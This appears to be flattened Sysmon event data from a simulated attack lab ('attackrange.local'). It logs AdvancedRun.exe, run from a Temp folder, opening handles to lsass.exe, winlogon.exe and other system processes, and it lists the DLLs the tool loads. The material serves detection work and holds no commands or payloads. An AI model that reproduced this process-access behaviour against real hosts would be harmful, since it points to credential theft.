20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004063633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.903{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063625Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.903{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063624Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.903{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063623Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.903{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.903{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004063621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.902{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004063620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.901{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.893{834264DD-DAE4-61EA-0C00-000000002702}6524660C:\Windows\system32\lsass.exe{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004063618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.884{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.879{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.877{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.877{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.875{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.875{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft 